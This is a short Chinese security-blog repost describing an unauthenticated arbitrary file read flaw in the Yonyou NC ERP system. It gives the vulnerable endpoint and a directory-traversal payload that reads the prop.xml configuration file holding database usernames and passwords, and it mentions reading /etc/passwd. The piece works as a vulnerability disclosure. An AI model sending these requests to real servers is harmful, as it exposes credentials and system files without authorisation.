用友NC任意文件读取漏洞

admin
admin
admin
101411
文章
87
评论
2022年10月29日16:17:27评论229 views字数 434阅读1分26秒阅读模式
用友NC任意文件读取漏洞
    文章声明

安全技术类文章仅供参考,此文所提供的信息仅针对漏洞靶场进行渗透,未经授权请勿利用文章中的技术手段对任何计算机系统进行入侵操作。
本文所提供的工具仅用于学习,禁止用于其他目的,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全

一、漏洞描述

根据分析,用友NC系统存在任意文件读取漏洞,在无需登陆系统的情况下,通过某接口可以直接读取服务器上的任意文件。

二、漏洞复现

访问系统首页显示如下

用友NC任意文件读取漏洞

目录、文件泄露接口

/NCFindWeb?service=IPreAlertConfigService&filename

用友NC任意文件读取漏洞

在某些情况下可以读取利用目录穿越读取/etc/passwd等文件。这里以读取默认配置文件为例,可以获取数据库账号、密码等信息

/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

用友NC任意文件读取漏洞

原文始发于微信公众号(守卫者安全):用友NC任意文件读取漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月29日16:17:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友NC任意文件读取漏洞https://cn-sec.com/archives/1366507.html

发表评论

匿名网友 填写信息